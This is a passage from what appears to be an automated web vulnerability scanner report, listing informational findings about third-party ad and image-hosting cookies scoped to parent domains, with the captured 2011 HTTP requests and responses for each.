anj=Kfu=8fG6Q/D>7)*0s]#%2L_'x%SEV/i#+=44FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c(4i[6K.]BEP%$)!].G3x0Ugl[k.@FC+W_hECb[7v:/v)7o'n((hXuS>:L?Wg4KG**/Qd4fR1Ox!Nj0reFd^e6F7/z4Q60)Bep_S01/TEx8MrH?Ndd1irwS?=d6/5Fml/alM2kt41pf67OGU#nuuJid`:>[95_PNPw*2S^*utjJsqu[qYF4WYQmiIaQ%PqxZX9gh2[Na3++6r?!<Xq:eB>*pFBZe2^P('_rT)@y#bYty')UOhM_3afV5I@^ugDsn11T'w'IQ74s9(D$?<YQm#FI0(7]8Vsi2KK!8LuQ^%V<>A7HsjFa08nA`5cGfJ#(Bi.i5pCUdFoX$R[vLvGu(6OGL6oY@=.c%-m8[G3ss%:`6GV7Qb'gw#F`ZgHsuQAk!?3BI9c4OzY?aS+!VCf/HK5[ZWZ#dkkKdVVB!'-qz+/oQx]eVr2Wc*gr5mdd=#7'f^3W8+lbf=mCa=vb/gbq5kXydBx[>; path=/; expires=Sun, 11-Sep-2011 11:13:30 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=88412&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=5360&cb=e2781b91d4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIyaEDEAoYAiACKAIwveHX7wQQveHX7wQYAQ..; acb645526=![nC'kI/7Z208jSlb1@WvA.(S?enc=PDw8vLS0BEAAAACgmZkBQAAAAKCZmQFA_dR46SaxBUCF61G4HoUJQOtdn4PwOjpp_ayDGovBdy-98PVNAAAAAMf7BwACAgAANQEAAAIAAABpowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAA3w4BAgUCAQUAAAAAkiK-AQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307963581%29%3Buf%28%27r%27%2C+369513%2C+1307963581%29%3Bppv%2811776%2C+%277582437727306472939%27%2C+1307963581%2C+1310555581%2C+62058%2C+73484%29%3B&cnd=!nSAXCQjq5AMQ6cYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwAHgAgAGaAYgBFpABAZgBAaABA6gBA7ABAbkBmZmZwR6FCUDBAZmZmcEehQlAyQEzMzMzMzP3P9ABANkBAAAAAAAA8D_gAQA.&ccd=!NQVcLQjq5AMQ6cYWGIy-BCAA; sess=1; uuid2=3420415245200633085; anj=Kfu=8fG49ED>7)*0s]#%2L_'x%SEV/i#.Ap4FO?KN1Ipz=Rr7(nTDn(:^i3A^y9mc%vk4^v$yM3WW6G<5`8#q8qLS%.Gg5e[?T1^Q#wfy+>=#D+$s`c(4i[6K.]BEP%$)!].G3x0Ugl[k.@FC+W_hECb[7v:/v)7o'n((hXuS>:L?Wg4KG**/Qd4fR1Ox!Nj0reFd^e6F7/z4Q60)Bep_S01/TEx8MrH?Ndd1irwS?=d6/5Fml/alM2kt41pf67OGU#nuuJid`:>[95_PNPw*2S^*utjJsqu[qYF4WYQmiIaQ%PqxZX9gh2[Na3++6r?!<Xq:eB>*pFBZe2^P('_rT)@y#bYty')UOhM_3afV5I@^uffiGg3loe_)9w>OXE0XS1<FVq8>N<NK+JwvPU[<Aw>/Vo+M1-dd'T][t]jxX4c'B'%GLib.!9k6_u]Zjv`/g*pjRm)68'b>8Np1?#LM=3Z]7NnwQ[*p.DN!Bbuk-hVOFHmk>VU1TzZUKz]`i7H%zU8Ps)y+:F]gin==ytl(Q+.Cuunmz('kd5(IZ-j$loI0ZD]tpAV!Hg?i=m@z3a?'I^_3z'O*

Response

12.87. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv:1|uid:4325897289836481830 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_97=3385-uid:c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.2083.199.59306.22924.23954.49027.49076.22869.59481.22328.57145.18842.30364.13450.1150.; PUBMDCID=2; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.362_1308102051.1928_1308102268.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html

12.88. http://img137.imageshack.us/img137/4291/d5zee1.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img137.imageshack.us
Path:	/img137/4291/d5zee1.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_uuid=d2e0c4806ee147ad905d441bff86fb6f; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img137/4291/d5zee1.jpg HTTP/1.1
Host: img137.imageshack.us
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 51360
Last-Modified: Mon, 13 Jun 2011 06:35:16 GMT
X-Server-Name-And-Port: img137.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=d2e0c4806ee147ad905d441bff86fb6f; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....H.H.....C.......................

............................... "..".......C.........................................................................................................
...[SNIP]...

12.89. http://img690.imageshack.us/img690/7868/umadbroz.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img690.imageshack.us
Path:	/img690/7868/umadbroz.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_uuid=80ac3f4f12974b329cddbd7205e076f3; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img690/7868/umadbroz.jpg HTTP/1.1
Host: img690.imageshack.us
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Type: image/jpeg
Connection: close
Content-Length: 23448
Last-Modified: Mon, 13 Jun 2011 04:35:56 GMT
X-Server-Name-And-Port: img690.imageshack.us:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=80ac3f4f12974b329cddbd7205e076f3; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

......JFIF.....H.H.....C...............
.

...............%...#... , #&')*)..-0-(0%()(...C....
.
.

.(...((((((((((((((((((((((((((((((((((((((((((((((((((........|.."..............................
...[SNIP]...

12.90. http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img851.imageshack.us
Path:	/img851/8021/f7e22bda31624279b2e3f96.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_uuid=3690891069e54cd1ad556a2d2b660af4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img851/8021/f7e22bda31624279b2e3f96.png HTTP/1.1
Host: img851.imageshack.us
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 13 Jun 2011 11:02:09 GMT
Content-Type: image/png
Connection: close
Content-Length: 24877
Last-Modified: Mon, 13 Jun 2011 03:01:23 GMT
X-Server-Name-And-Port: img851.prod.imageshack.com:14080
Accept-Ranges: bytes
Set-Cookie: is_uuid=3690891069e54cd1ad556a2d2b660af4; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.imageshack.us; path=/
P3P: CP="NOI CUR ADM OUR NOR STA NID"
X-Server-Name-And-Port: _:14000

.PNG
.
...IHDR.......;.............bKGD............. pHYs..........+.... .IDATx...{X\.}..[.2W.3.4..B..F.m@.$.e.Q..5VHb.u..qI!oN.&i.>..
o.:...o.S...&I..'..NP_...]GqbL...n....H.00.u_....;3...4.~.G..f
...[SNIP]...

12.91. http://imp.constantcontact.com/imp/cmp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.constantcontact.com
Path:	/imp/cmp.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

impcc="IMP_14302119028291151=21766357|IMP_14302119028205613=21799456|IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|"; expires=Sun, 11-Sep-2011 12:16:42 GMT; path=/; domain=.constantcontact.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/cmp.jsp?impcc=IMP_14302119028205613&o=http://img.constantcontact.com/lp/images/standard/spacer.gif HTTP/1.1
Host: imp.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985396&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395573&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307967395282&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=17&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=803&xpc=mcyiAGkaHy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cclp_partner="prt_01_ts=21765467|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=cc::CLK_14302119028162790|cc_01_ts=21765467|"; cclp_content="lp_uid=20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages|"; cclp_referral="partner=ROVING|cc=CLK_14302119028162790|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; mbox=check#true#1305928126|session#1305928065281-657231#1305929926|PC#1305928065281-657231.17#1313704077; __utma=152702054.1555155570.1305928095.1305928095.1305928095.1; __utmz=152702054.1305928095.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26EB70CF851D05A5-4000012DA001F43D[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Cundefined%7C%252Findex%252Ejsp; impcc="IMP_14302119028291151=21766357|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|IMP_14302119028231880=21775050|IMP_%3Cplacementid/%3E=21774938|"

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 07 Sep 2007 15:01:23 GMT
ETag: "b95c5-2b-4398ce98736c0"
Accept-Ranges: bytes
Content-Length: 43
X-Powered-By:
Content-Type: image/gif
Cookie: "IMP_14302119028289014=21759862|"
IMPCC_COOKIE_NEW:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028289014
Expires: Mon, 13 Jun 2011 12:16:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 12:16:42 GMT
Connection: close
Set-Cookie: impcc="IMP_14302119028291151=21766357|IMP_14302119028205613=21799456|IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|"; expires=Sun, 11-Sep-2011 12:16:42 GMT; path=/; domain=.constantcontact.com
Cookie: "IMP_14302119028291151=21766357|IMP_14302119028205613=21799456|IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|"
IMPCC_COOKIE_NEW: IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|
IMPCC_COOKIE: IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028205613

GIF89a.............!.......,...........D..;

12.92. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv3NzMJZjpn3tvXN5oCW6CTkwctQrAqXr4DyB/E++0lrZBz0XEqsdq/oLkcyD1HB535ecH2yQk8aXHAMOJs+2n+rxyycgR1MKWlhAgxfS3iSrgAs2jpe+yvn8K2rxozalguXRbMHL1Xj0tc//rI4kc7qGS/eDlhXRyox/8cF3uA+CrH0aRzrpciC6E5la1vQpLqPPunsYUn/u3AT+p36gLGc+SA5z/ryJK9/Lfn0bClh2vlrtBAzuZujVJMiKWDlaqxnMt+wg0Jw3lGCxNfWFbPJFZL1lKYNzXADwpgINcAOlL0r2FeKDYHge/rbscRTiZElGwFimOI11JRk0KklHrGCNiy26N8IhhTg2d/1v4vKGw9kYA9cE9B7rEq5akAFx+4/I5CjjIdhSJqqNA+OleQZ7fR/OWLFZ4AAD7HeRUnfiE8B1nXx1a5s7ylk4i1PgGL2Zab/y6UPgdZhTF/KD1yRVSz5gNQ+z7aZEKA8CKuYPMoT+Tkf1lWpBY+MKtaGNSFt76vzw7dxpBqf9fV4a1O/mlnH34bm15MqeWDpsKusAedE02istIFaC5/UxHUbLUSdP8x9dEUpVLKXrP8SZWv2zoryuV+qPQyII355Ntg+tfY/KzBWMuBUdc4ibR3EofEeFdvCEB012oNMa/Hnhjxvn+wWGlPXXy/9sgUt5O8/ytF7yiVr3R9PUTG49A+48Cx+SJbt/zwaM/ej9Lgel9YlJ5ko/7YzqPpG9+wRugmdqyGiKiRwCQqX7wNDyk7qKQs/kfG24bBIDhcB4aHnoin/3aoPW1zJJGJ/ibTimX8T/1YGkKApW2CWoG3arEGma7zn0LNQgmKLfCkiypAQnXIgQ7T8F2cCEfDA22ug/LibefoTAuMLTQgGjesCPdbNrwfnxuoaGP9GNAYzLF0//YJigvUNpcPG27VYw1qyWwoxnJ9q5OTOoRCa3MezIUW6npAkKMdyaL5jK8GDnT/fBycyjRwWINB3wcR4MiH14bRLdeTdXZUICfcViDmdmEqrHNdbCGDzq84XAH9e0pTSUCU+aOcvgZA9rEbArxlNNffMDswsC2g/Uhusot+1v7+gDJjTa/Ztj+4Zq6KW9y9XPeGG+9QUI/aZaqMFx7PMX6UPD1534KvbEeYfe2CojNDeFG6iVcUKjF5PeGLrloX2YixITiGVvkKWSx13RxyF/0Cnlnkewfn18srhgSd/xEN9UNu8F6IEABtK2r0Vu4ryeFrfjFVdC1ZGR9BC4a/lX1cgQnaiLo0Zkyx1pATonDkg3Jx4sUThFEX0LhkAN+C/v+2BtkiEUf7wiGqAGE7Lfb8scj6F1f2OQ1yNJsp86R0g/mnstNh8Zn72QsN0xHDyr5BP27t+1q1QV3n/lXD8jsppi2TEBvRWtVgKgJJF1OxRv3P+0/t1Jc1A7fNTtde5mnZkj/GfpB6KkYhBTIxOySOOwmnTFvbQPO6O0jIgSA419dsfLPK0nVH2RJ3KC/IPOdPz7QSH4IAbhJ5NEoQf28ctm+FdwTR7L53m49f54hp9uWL0PfS/V/YCt4Qj5kQrR/9/8QBUF+WRCDYYbIhJrHdLroy/d5ne0X3zGbhGKAzI8w7voTqtTGzBGLgJmtFoQdjOiGG9Tj6N4gj/Oxabtr0rWazwXS5TzjG/UYbfMobryzEnZVdDVbrmwZAJh/h8HMvesrk5jWgk8xvy60mxPuVSK5VLx5Yhz5C0riAFQ4usH3bjTnUF8ipaBWYatjwQl9p4xFkzA7gqA==; Domain=.revsci.net; Expires=Tue, 12-Jun-2012 11:22:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=H07710 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e047724&2&10055,10194&4dde515c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3hc5wFS813Gq63dQ4yV9iELcns7XRnSRJyu5Y8IIde+Kg6mfGZlUB4SruQI4rTs4y2UgncVUg67T0dB9naIhEG35bFZpiOLnlDeWfgSTEifCxEyJ1ceTv+CvvfhLsErHWoX5vAgUisClWxkkFkhxs6Sv1tjV/vyxy4fyHWGaZ9JT9qnb+FkC8amdlQjXUQiyisWC5oDDw0PhPbCP3F9Z1qxK0beEcbhyyvGzihAkA/Vfk5Knkfc8nh+j/k1YU55yv/Pj6+8pRjOs0eCnapK0c7govd9KIGekeA92uHXiJmdOH3Fj86gGCeUHtlngmDdE3wiQpjMJinyKJsp3NUVfgvynJ8ChbRL1hJtD4ix7620XA3Cu43Q7rUALrFRB7hSYbnxH1DiakaRoPQGlDgsmHcZ6VNJViQNDlUUNBtQC9V/Bo1B8SV1qPwPkqpqKMoKx4EVolbD9I+B5ZaTp6LdNkplgtQGq2GBFC0RP20KwexUAxyyET0gYqUuE8snZn+eSFplsIg1DUqqukxdFonny1plhRnx77ZiZ/YytfcasGUM6qBoU8LURR266NFiuMKy3Q7qSqVNThgHPly1BQtxmYuE1I2to+TWhZgmpwEbU6M/Z9t8dBAw/RoVAXfz4gC+Ix2ftyJnvHv9D2uGCArULbvHTLc+r6V2GdNA0Qch7qlUOsrFgpzcj5CfW3dEVFQdPkbT1uGdCmrXtCPx3t/I0bCTNvXA8tkeYkWwjXW5dSJPOoB8XWpy37JCPFsCXQBX6nI88AH++/1ww9pK76sPlx5hKUa+2lHQS9q0ssezOFdXJbxOIoP2/zVx7uNsWnulFgCUuGnZiv34zCdfIwORufZ/aFEbttB86Ty9IbNn1bPDk89J2JRbg2tYNleBBsRFD+ezR2ymlRUIZM1BlN3xid2OePOp2U/AsvF1a0JuT7MtoUkFmGqGNRTtReaom/4ubmFRLyawfTvXiRUf+9sYaXeajN9TIQZcYUHADPCytuemY6ogkyV8cvZpCiidb5NjP5ZHu2i1ZADHx2Z3GJg/74NQ5iDinPeSBGyQLrVGSmL8EI2ychKfySxZaVn0pR/X58c6ZROzpGbWFWEBdbXRtX57fcyU0J6HPGhhU6ja7heRrL6zMkHx24erUBtdcdKoCEQkWDvqFAUiZjWn2pQrJBmDDPJiDAhugHkPqBuRwoNkcFHM+Ul1CXV0xjhlpTJAN5BWVuiNwGr2UO4VipnJucbDlYsFREeH5YdOwEjKBA/E9Rt9BLiuJBMlxjdA5LAipAsvZqktR2IY/FiQaf9UqERS6fceUDbpf2RHgSxyB6GJmoT5/jWlVrw7+UqF/SBkEGMBMSGrfRvLoQbh+VWCASXh9QowKqow4YiH3URFCK98HsRl+ktH12AxKPTkO3N3ku/EoB8w+GDlrCM8/rz0p5O2U4rFI8tTeaQnc9s/cxneMy93qzcjR2EsI311rxEnOippysW4MsvYNXJV2DVTJx5dMgzdL+sjtnJObK46UpX+uvyYcKXRWZORvu59UXBHjMTQOFsaamGFEJlVtL6RuDUn7c0hZKI3ihf5kDNRl5G5vN5jkwCaqUDdKc1rya43vP0DgBrQrrnh22h/hLsSXrw0kmDs/yvZvB3yF8Ma2aUzT7TwofCD8sSXhkJ5pmhWPgOtW76NBA7LDWFkE1u9KpZPYUEKnzM2LYQqZUm3eYoh+G78=; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_KnBd="MLsXtaEuLjhnJ5H4uuj6RIn8q1zxXkRaxrcCnA/XZiexnJudKcBKFqX3d5gJtWlys7/aNmF8oZqyUuBF44LLsBp/XmHM56eUfVPr2ig9T6usUThEu2SqpAPvDqb6CyW6nYvjH55JvTEz7ztCB8UDyiuPPYeValoCtghc53ATcftLlZjnEgAPGIuT3ccVrMzGzcsN38GTvgf4/xW4hsUQY0o/mUCkjdomf5pMOwHwd7oxLJKSBO3UaEv1fSc+XxMcAbYQgzBKRrnTMVWQerlfyFrtHciD2WRj9Hl6FvA3VUak9Qt7o0e6fPEJsGJqVJkoLLdjSFpfpsMzHUbwM9OnItS46jK+7cAOnbtY8Ab340ENjp4oJt9Sm3XYqMgVtXazcRrw1dRB94ZkpCzHTf1wGhBH4TVzFOPMgM4VvO6l9W2pCbe9gL6mIu2Z3iV1SL6CRrHrt2hhFeS7E6X/JOCAGFAS8J4uXu8CfVms2bvl/TNZEa+jwdcWhmDo9rJzyLgpp2J9+0ZVtKPBK2fa00U8mjxUHtREi1DlGEWGI9qC72INlQ96yKONNH2Usf54jWCV59JB9+pmKoptb/M3tn1UBxLw7TOrvaGH2Vgu0qnpeESbbFW8oYECJwOx+T0PnZUmJyMAgUnwKdSxoQ5/oODIcrlhJ3cCFfD92UhjutN0crrFdWgNkQS65AT600jwikq34ITDYHMDmrqLYKfXZH2GgJjvI6nApXpU17mCK4ZqgCncSzwSyPT2t+2Hoqj4v1Y/Vl7cpU+m3uzXpoMQVtf2UGhbGYYYnXDE3CzsOhxZQeVgvkyopNpVxf2ol5Xxx/AhCkYT767N3KzAydtiKelxQf/g6tHbcsBwA9TTn9OrvCvjv6WdzqYlx9izGGG45S9WZPu7/zyeEoWybPlMvNc1Rpc/y2Cx9GUqJic9l6xTJAngZJXSZs+o41XOifpIFlJ7B4F+f607RMUfq1lseGpu+QNpPJM2iNlqXoTt9ik8U7vM8LgvcO1ZptgPI0/dOoVc//bTvzAueoNhAfybFk6RtIDuCQDEkWQQR/s00vMesVzR6+fjte0Ly7xbOq7Bq99zQL6bL0v73Fdn48baV2n71UFIbXsDqYg0kQCEo6eQ7NMyDvoCntLca0rKDrq4L/m0kT4FQlcT4jJF4rFH4hjWRpsoJAOPN4Aiz8qNXUY2XFyk45k984HTHv0NaRezUn0="; 